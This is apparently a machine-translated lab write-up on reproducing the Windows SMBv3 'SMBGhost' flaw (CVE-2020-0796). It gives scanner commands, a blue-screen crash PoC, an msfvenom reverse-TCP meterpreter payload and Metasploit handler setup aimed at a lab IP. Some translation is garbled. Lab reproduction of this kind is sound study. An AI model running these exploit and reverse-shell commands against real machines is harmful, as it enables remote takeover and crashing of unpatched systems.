Vulnerability profile

Eternal black holes and “ Eternal Blue ” The vulnerabilities are very similar , It's all about using “Windows SMB service ” Vulnerability remote attack obtains the highest authority of the system .

Vulnerability level ： High-risk

“ The black of eternity ” The high risk of vulnerability is to SMB Attacks on clients , An attacker can construct a “ Specially made ” The web page of 、 Compressed package 、 share directory 、OFFICE Documents, etc. , Send... To the attack target , Once it is opened by an attacker, the vulnerability will be triggered instantly and attacked .

Attack principle ：
This vulnerability stems from SMBv3 Compressed packets are not handled correctly , When decompressing the data packet, use the length transmitted by the client to decompress , Did not check whether the length is legal , The result is an integer overflow . Exploit the vulnerability , The attacker can attack directly and remotely SMB The server remotely executes arbitrary malicious code , You can also build malicious networks SMB The server induces the client connection to attack the client on a large scale . Once the eternal black is successfully used , Its harm is no less than eternal blue .

Causes of loopholes ：
CVE-2020-0796 The vulnerability lies in the affected version of Windows drive srv2.sys in , because Windows SMB Update to 3.1.1 The version added support for compressed data , The legitimacy of the compressed data transmitted by the user is not verified .

Affected by Windows edition

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)

Environmental preparation

1 An affected windows edition
What I'm prepared for is Windows10 1903 Enterprise Edition 64 position （ I specially installed it myself ）
I need the suggestion of mirroring https://msdn.itellyou.cn Download the website you need .

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
Confirm the current target Windows The system is the affected version

Windows edition , Press win+r, In the pop-up run window , Input winver

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

Next, open the SMB service ：
win10 How to open SMB service ？
1、“win+R” The shortcut key pops up the run window , Input control determine ;

2、 Click... In the pop-up window “ Program ”;

3、 Click... In the pop-up window “ Enable or close Windows function ”;

4、 Click... In the pop-up window “SMB 1.0/CIFS File sharing support ” Select all , determine ;

5、 Wait in the pop-up window to search for the required files , Then the function will be enabled automatically ;

6、 In the pop-up window, as shown below , Just restart the computer （ Please save the opened file and restart ）;

2 Normal computer （ It's also win, Because to execute exe file ）

Drone aircraft IP：172.16.135.138
attack IP：172.16.135.137

Use process

【1】 Use chianxin's vulnerability detection tool

Directly in cmd Start in CVE-2020-0796-Scanner.exe
（ It is not recommended to double-click to open , Otherwise easy “ Flash back ”）

Enter the scanning target according to the prompt IP Or scan IP Range

（ This is just for convenience , Direct scanning 172.16.135.138-172.16.135.142）

【2】 Prepare the blue screen payload
Use CVE-2020-0796 Blue screen tools to attack

python3 CVE-2020-0796.py < The vulnerability is found IP>

python3 CVE-2020-0796.py 172.16.135.138

If the target doesn't have a blue screen, attack again （ The first 1 pit ：kali Of 3.9 Never , Changed the real machine 3.10 That's all right. ）
Real machine reproduction ：

python3.9
use kali, Live or die without jumping

With virtual machines win10:

Other methods of detection

In addition to using Chian Shun's vulnerability detection tool CVE-2020-0796-Scanner.exe, You can also try ：SMBGhost

（1）SMBGhost

Download address ：https://github.com/ollypwn/SMBGhost

download ：

git clone https://github.com/ly4k/SMBGhost.git

scanning ：

python3 scanner.py <IP>

（2） Use the blue screen payload, Validation vulnerabilities

Blue screen POC Address ：https://github.com/chompie1337/SMBGhost_RCE_PoC

install ：

git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git

usage

python exploit.py -ip 192.168.142.131

Unsuccessful proposed switch python edition .（ Pit point 2: use python3.9 Can't be repeated , however 3.10 Can ）
The picture below is for me 3.10 Reproduce successful

however 3.9 No way. ：

Or ：

....

utilize msf Generate exp rebound shell

First

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.135.203 lport=1335 -b '\x00' -f python

The meaning of each parameter ：

-p  Specify the payload( Attack load ) yes windows/x64/meterpreter/bind_tcp
lport  Designated port 
-b    Set circumvention character set , such as : '\x00\xff' Avoid using characters 
-i     Appoint payload Encoding times of 
-f    Specify the output format 

Then combine SMBGhost_RCE_PoC-master The attack .
Be careful ：
SMBGhost_RCE_PoC-master Medium exploit.py The original file cannot be directly used to attack , You need to modify one of them USER_PAYLOAD part ;

start-up msf
msfconsole

Use the monitor module ：
use exploit/multi/handler
Set up payload
set payload windows/x64/meterpreter/reverse_tcp
To configure options
then run

Then back SMBGhost_RCE_PoC-master The attack ：
python3 exploit.py -ip

Then press enter to get shell
Anyway, the blue screen got ：

But I didn't get shell, Then I changed another one Kali, Not yet. …
Then I asked a big man , Said the hole itself could play shell, But not very stable . It doesn't use a lot .

It should be the target plane . A really problematic target plane can reproduce .